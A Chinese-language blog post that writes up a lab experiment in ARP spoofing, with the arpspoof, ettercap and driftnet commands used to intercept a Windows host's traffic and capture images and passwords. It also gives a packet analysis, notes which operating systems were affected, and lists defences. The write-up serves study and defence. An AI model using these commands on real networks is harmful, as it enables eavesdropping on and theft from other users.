ARP spoofing 實驗與分析

原創 布鲁斯XiaoY 2018-08-31 19:10

定義

ARP spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally, the aim is to associate the attacker’s MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead.` (By wiki)

拆分如下幾個概念:
- 利用缺陷:在 Data Link Layer 利用 ARP 協議安全缺陷
- 攻擊範圍:限制在 LAN。ARP協議本身特性決定
- 攻擊對象:對目標機與(通常)網關。以中間人 Man in the middle(MITM) 身份

場景實驗

拓撲

kali_penetration_topo

涉及工具

  • arpspoof
  • ettercap
  • driftnet
    Note: 使用Kali 2.0 Linux 實施。默認這些工具預裝。

目的

利用 arpspoof or ettercap對LAN中的Windows host(Win10)進行 ARP spoofing 攻擊。
1. 在攻擊host開啓 ip_fowoard,默認關閉。如不開啓,可以導致斷網攻擊。
2. 運行arpspoof

## Bi-direction arp spoofing, or cause DOS due to only half traffic being redirected to attacker 
## How to use arpspoof
arpspoof -i <interface> -t <target> <default gateway>
arpspoof -i <interface> -t <default gateway> <target>
## Actual commands run
## Gateway's IP 192.168.168.1
## Victim's IP  192.168.168.101
arpspoof -i eth0 192.168.168.101 192.168.168.1
arpspoof -i eth0 192.168.168.1 192.168.168.101
  1. 利用 driftnet抓取竊取流量彙總的圖片(也可以是音頻)
## Capture images from network traffic and display them in an X window.
driftnet -i  eth0 -m 200 -a - d ~/Pictures    
-i interface
-m maximum picture number to store
-a no print on x-window and just store
-d directory
  1. (可選)工具 ettercap 替代arpspoof
ettercap -i eth0 -Tq -M arp:remote //192.168.168.101// //192.168.168.1//
參數說明:
-i: 網卡
-T :文本模式(-G 圖形界面)
-q:安靜模式,僅當嗅探到密碼時才顯示
-M:攻擊方法
-P:加載插件,比如sslstrip

抓包分析

Sniffer (192.168.168.104)– Win host (192.168.168.101)
——> who is at 101 (request)
<—— win’s mac is at 101 (reply)
——> who is at 1 (request)
<—— gw’s mac is at 1 (reply)
arpspoof starts
——> gw(Sniffer’s mac) is at 1 (reply) ## cheat Win host
——> win(Sniffer’s mac) is at 104 (reply) ## cheat Gateway
… repeat above two actions periodically

結論

  • Windows(10)/ Android(5.02) can be sniffed
  • Iphone(8.4)/Mac(10.11.5) can NOT be sniiffed
    由上可見 IOS 與 OSX , 當接收到重複(攻擊) ARP reply,並不會強制刷新 arp table 。

應對

  • Static ARP entries
    配置靜態 ARP 條目(N^2 - N)
  • ARP spoofing detection software
  • OS security
    取決於不同OS的配置
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Linux下Libpcap源碼分析和包過濾機制

   libpcap是unix/linux平臺下的網絡數據包捕獲函數包,大多數網絡監控軟件都以它爲基礎。Libpcap可以在絕大多數類unix平臺下工作,本文分析了libpcap在linux 下的源代碼實現,其中重點是linux的底層包捕

yaoyepeng 2020-06-30 01:06:06

UDP內網穿透

首先先介紹一些基本概念:    NAT(Network Address Translators),網絡地址轉換:網絡地址轉換是在IP地址日益缺乏的情況

yaoyepeng 2020-06-30 00:25:13

基於數據挖掘的IDS介紹

0引言 隨着信息技術的迅速發展,計算機及網絡技術給人們在信息利用與資源共享方面帶來了極大的方便,與此同時,也成了單位內部心懷不滿的人員、黑客、競爭對手等 人攻擊的目標。計算機網絡安全已引起了人們的廣泛關注。傳統的安全保護類技術採用認證

yaoyepeng 2020-06-30 00:25:12

防火牆類型總結

公羽龙天 2020-05-31 00:38:54

【網絡爬蟲】BeautfulSoup爬百度百科(真の能看懂~!)

Li xiang007 2020-05-01 05:25:48

【Kali滲透全方位實戰】Metasploitable2系統介紹

Li xiang007 2020-04-26 11:50:20

【Kali滲透全方位實戰】Linux終端和基本Linux命令&terminator

Li xiang007 2020-04-26 05:49:51

【Kali滲透全方位實戰】Aircrack-ng拿隔壁女神家的wifi密碼

Li xiang007 2020-04-22 22:17:54

【Network Security!】深入淺出ARP協議&使用中間人截獲密碼

Li xiang007 2020-04-19 00:04:29

【Network Security!】關於DDOS攻擊的現狀分析與探索

Li xiang007 2020-03-31 23:54:40

【Web安全】Weak Session IDs (弱會話IDs)-burp進行Cookie劫持

Li xiang007 2020-03-25 00:56:45

【Network Security!】Banner信息收集

Li xiang007 2020-03-16 20:56:11

【Kali滲透全方位實戰】子域名的概念與探測(DNSenum工具和Sublist3r腳本的使用)

Li xiang007 2020-03-15 12:35:21

【Web安全】XSS簡介與XSS測試平臺截取用戶COOKIE的探索

Li xiang007 2020-03-15 12:35:21

【Network Security!】Ubuntu18.04切換到root權限和sudo

Li xiang007 2020-03-10 19:37:39